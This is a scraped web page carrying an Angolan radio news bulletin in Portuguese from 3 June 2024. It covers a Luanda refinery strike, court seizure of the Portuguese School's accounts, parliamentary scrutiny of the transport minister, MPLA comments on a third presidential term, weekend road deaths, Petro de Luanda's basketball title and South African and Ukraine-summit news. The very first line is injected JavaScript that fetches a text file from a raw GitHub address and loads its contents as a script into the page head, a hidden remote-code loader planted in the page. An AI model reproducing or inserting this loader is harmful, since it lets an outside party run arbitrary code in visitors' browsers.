;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 03 de Junho de 2024 | RadioPlayDigital
Jornal 12h, edição de 03 de Junho de 2024

Tópicos:

TRABALHADORES DA REFINARIA DE LUANDA INICIAM PARALISAÇÃO, POR TEMPO INDETERMINADO, A PARTIR DA PRÓXIMA SEGUNDA-FEIRA;

– PARLAMENTO GARANTE QUE VAI CONTINUAR A FISCALIZAR O TRABALHO DO MINISTÉRIO DOS TRANSPORTES, PARA AFERIR OS DADOS APRESENTADOS RECENTEMENTE PELO TITULAR DA PASTA;

– 9 MORTOS E 29 FERIDOS, EM CONSEQUÊNCIA DE ACIDENTES DE VIAÇÃO DE VIAÇÃO, NO ÚLTIMO FIM DE SEMANA, EM LUANDA;

– PETRO DE LUANDA SERÁ O REPRESENTANTE DE ÁFRICA NA PRÓXIMA COPA INTERCONTINENTAL DA FIBA, A REALIZAR-SE EM SETEMBRO PRÓXIMO;

CHINA NEGA PRESSÃO SOBRE PAÍSES PARA EVITAREM PARTICIPAR NA CIMEIRA DE PAZ NA UCRÂNCIA.

JINGLE 

Jornal ao meio dia de segunda-feira, 3 de Junho de 2024. Coordenação de Alves Fernandes, técnica de Edson Machado, Edmundo Simões e Paulo Miranda Filho, edição e apresentação de Zacarias Congo.

JINGLE 

 Os trabalhadores da Refinaria de Luanda em regime de contrato temporário vão iniciar uma paralisação total, por tempo indeterminado, a partir do dia 10 de Junho próximo, em reivindicação contra a falta de enquadramento do pessoal.

A medida foi decidida em assembleia, no último sábado, e só não será concretizada, caso a entidade patronal se pronuncie favoravelmente nos próximos sete dias, tal como adianta o porta-voz do grupo de trabalhadores, Adilson Serra.

ADILSON SERRA 01 – 01′ 59” 12H 03 06 2024

Segundo o porta-voz do colectivo de trabalhadores, a paralisação poderá causar a escassez do gás de cozinha e de combustível, em Luanda.

ADILSON SERRA 02 – 02′ 10” 12H 03 06 2024

Adilson Serra, porta-voz do colectivo de trabalhadores da Refinaria de Luanda, em regime de contrato temporário, anunciando o início de uma paralisação total, por tempo indeterminado, a partir do dia 10 de Junho próximo, em reivindicação contra a falta de enquadramento do pessoal.

O tribunal da comarca de Belas, aqui em Luanda mandou penhorar as contas da Escola Portuguesa de Luanda para pagar uma dívida associada à sentença que, no ano passado, deu razão aos professores que mantêm um conflito laboral com a escola portuguesa.

 Segundo a decisão judicial, datada de 15 de março, foram indicadas como “bens à penhora” as contas bancárias tituladas pela EPL e a Cooperativa Portuguesa de Ensino em Angola, entidade que geria a Escola antes da tutela passar a ser assumida pelo Ministério da Educação.

A decisão foi executada na passada quinta-feira, segundo uma fonte ligada ao processo.

Em causa estão valores relativos a acertos salariais desde setembro de 2022 até abril deste ano, já que a EPL, depois de condenada a proceder à “assunção dos direitos e obrigações” dos contratos de trabalho iniciais, não cumpriu a sentença.

O valor ronda atualmente cerca de 200 milhões de kwanzas  que, segundo a mesma fonte vai acrescendo todos os meses caso a escola não pague nos termos da sentença.

No despacho o Tribunal de Belas determina que as instituições bancárias procedam à penhora das contas e informem a instância judicial sobre o montante penhorado num prazo de dez dias.

A Escola portuguesa tem um prazo de cinco dias para se opor à execução judicial.

PONTO

O analista MFM para os assuntos económicos, Carlos Rosado de Carvalho, disse que a audição parlamentar ao ministro dos Transportes, seria valiosa de fosse aberta à imprensa, com direito à transmissão em directo. 

O analista comentava assim a ida à Assembleia Nacional de Ricardo de Abreu, para as explicações exigidas pelos deputados, no âmbito da compra de mais de seiscentos autocarros para melhorar a mobilidade no país.

CARLOS ROSADO DE CARVALHO 12H ( 02.30”)

Carlos Rosado de Carvalho, analista MFM para as questões económicas, sobre a audição ao ministro dos Transportes, Ricardo de Abreu, na Assembleia Nacional.

PONTO CORRIDO

Sobre este assunto, a 5ª Comissão de Economia e Finanças da Assembleia Nacional garante que vai continuar a fiscalizar o trabalho realizado pelo Ministério dos Transportes, para aferir se os dados apresentados durante a audição realizada recentemente, em Luanda, correspondem, verdadeiramente, à sua aplicação, tal como fez saber o deputado João Mpilamosi Domingos.

Nas vestes de vice-presidente da 5ª Comissão, João Mpilamosi disse que os deputados ficaram satisfeitos com as explicações prestadas pelo ministro dos Transportes durante a audição, e que recomendaram que num prazo de seis meses, na altura da apresentação do Orçamento Geral do Estado, apresentem um plano de viabilidade técnica económica que evidencie a rentabilidade dos aeroportos que estão a ser aproveitados para realizar voos internacionais e alavancar o turismo.

Os deputados defenderam, igualmente, um melhor esclarecimento público das cláusulas do contrato de aquisição de 600 novos autocarros e sobre a construção da fábrica para a montagem dos mesmos e aquisição de peças.

“Devem esclarecer melhor sobre o processo e nós deputados vamos continuar a fiscalizar para que de facto se tenha a certeza que esses valores serviram para as cláusulas descritas”, ressaltou.

João Mpilamosi disse que recomendaram ao ministro dos Transportes para que haja também maior comunicação sobre a subida dos preços dos transportes públicos, e se possível que isso se faça de forma progressiva para não afectar o bolso do cidadão.

A TAAG, Linhas Áreas de Angola vai receber até final deste ano, cinco novos aviões para reforçar a frota existente da companhia de bandeira Nacional.

Segundo o ministro dos Transportes, Ricardo d’Abreu, trata-se de aviões de pequeno e grande porte.

O titular da pasta dos Transportes fez saber ainda que serão introduzias novas embarcações para a travessia no Mussulo, em Luanda, e para o Sul do país, bem como do surgimento de um plano para combater o lixo nos Caminhos de Ferro.

PONTO MPLA

O MPLA descarta qualquer intenção sobre um suposto terceiro mandato do Presidente da República, assunto tem sido tema de conversa em vários círculos de opinião.

Durante um encontro com jornalistas de diversos órgãos de comunicação social e fazedores de opinião, o secretário para a informação do MPLA Esteves Hilário, considerou que “isto é um não-assunto” e disse que perguntas sobre um terceiro mandato de João Lourenço “são apenas especulações e que não fazem parte da agenda política do partido para 2024”.

ESTEVES HILÁRIO – MPLA – 02′ 30” 12H 03 06 2024 

Esteves Hilário, secretário para a informação do MPLA, afirmando que não há qualquer intenção do partido em desrespeitar a Constituição, reforçando assim que o candidato do MPLA às eleições de 2027 será definido no Congresso de 2026. 

PONTO

Continuam as reações à volta do Decreto Presidencial que aprova o regulamento da Lei sobre a Organização, Exercício e Funcionamento das Actividades de Comércio Ambulante nas ruas de Luanda e não só.

Entre os produtos proibidos à venda na via pública, estão os animais vivos, carnes verdes, fumadas e miudezas comestíveis.

A este respeito, o médico veterinário, Sílvio Alvarenga, esclarece que cerca de 65% das doenças dos animais são transmitidas aos homens. Mais dados com a jornalista Maria Humba;

PEÇA MARIA HUMBA 12H

Trabalho da jornalista Maria Humba.

PONTO

18 mortos e 65 feridos estão entre as 150 ocorrências registadas pelo Serviço Nacional de Protecção Civil e Bombeiros, nas últimas 72h em todo o país.

Os afogamentos, acidentes de viação, queimaduras em incêndio e desabamento de residência, são as principais causas das mortes, tal como esclarece o porta-voz nacional, Superintendente Bombeiro Wilson Baptista.

WILSON BAPTISTA – BOMBEIROS – 01′ 06” 12H 03 06 2024

Superintendente Bombeiro Wilson Baptista, porta-voz do Serviço Nacional de Protecção Civil e Bombeiros, e as mortes registadas no último fim de semana, devido a afogamentos, acidentes de viação, incêndios e desabamento de residência.

De mortes não é tudo…

9 pessoas perderam a vida e 29 outras ficaram feridas, em consequência de 23 acidentes de viação de viação, registados durante o fim de semana, em Luanda.

Os dados foram apresentados pelo porta-voz da Polícia Nacional em Luanda, Superintendente-chefe Nestor Goubel.

NESTOR GOUBEL 01 – 40” 12H 03 06 2024 

No mesmo período, foram detidas 312 pessoas, por suposto envolvimento em crimes diversos, apreendidos vários meios, com destaque para 11 viaturas, 3 armas de fogo e 2 Terminais de Pagamento Automáticos, vulgo TPA’s.

NESTOR GOUBEL 02 – 01′ 17” 12H 03 06 2024 PONTO DESPORTO

Superintendente-chefe Nestor Goubel, porta-voz da Polícia Nacional em Luanda, e o resumo das operações realizadas nas últimas 72h.

PONTO DESPORTO

O Petro de Luanda será o representante do continente africano na próxima Copa Intercontinental da FIBA, a realizar-se em setembro próximo, em Singapura, fruto da conquista da Liga africana de basquetebol onde derrotou no último sábado o Al Ahly Ly por 107-94 na final do torneio realizado em Kigali. 

As selecções nacionais de juvenis e séniores de Artes Marcias Mistas vão competir nos mundiais de Agosto e Setembro com estatuto de campeões africanos, feito conseguido em Windhoek,  capital namibiana. 

O presidente da Federação Angolana de Artes Marcias Armando Diogo disse que não foi fácil conquistar o campeonato africano, mas que foi possível graças ao esforço da equipa técnica, que conseguiu manter os atletas em forma.  

ARMANDO DIOGO – DESPORTO – 01′ 32” 12H 03 06 2024 

A selecção nacional de Angola brilhou e conquistou a 7ª edição do Campeonato Africano de MMA, que decorreu na República da Namíbia, Windhoek, com um total de 53 medalhas : 21 de ouro, 20 de prata e 12 de bronze.

PONTO INTERNACIONAL

O Presidente da África do Sul, Cyril Ramaphosa, considerou que as eleições demonstraram que o país tem uma democracia “robusta”, afirmando que os sul-africanos votaram por um “país melhor” nas eleições mais contestadas desde o fim do ‘apartheid’.

Ramaphosa, que é também presidente do partido Congresso Nacional Africano que perdeu a maioria absoluta e 71 mandatos nesta votação para o Parlamento, adiantou que “o povo falou, quer se goste ou não”.

O Presidente da República sul-africano referiu também que “o resultado destas eleições significa que os eleitores que votaram esperam que todas as organizações políticas encontrem terreno comum para resolver as suas diferenças e trabalhar em prol do bem de todos”.

A China negou hoje ter pressionado certos países para que não participassem na Cimeira de Paz na Ucrânia, contrariando comentários do Presidente ucraniano, Volodymyr Zelensky, no fim-de-semana.

Falando à margem de um fórum de segurança em Singapura no domingo, o Presidente Zelensky acusou a China de trabalhar para impedir países de participarem na Cimeira de Paz na Ucrânia, marcada para Junho na Suíça.

Segundo a Lusa, dois dias antes, Pequim tinha dito que seria difícil participar nesta cimeira se a Rússia não fosse convidada, declaração aprovada por Moscovo.

Data de Emissão: 03-06-2024 às 12:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados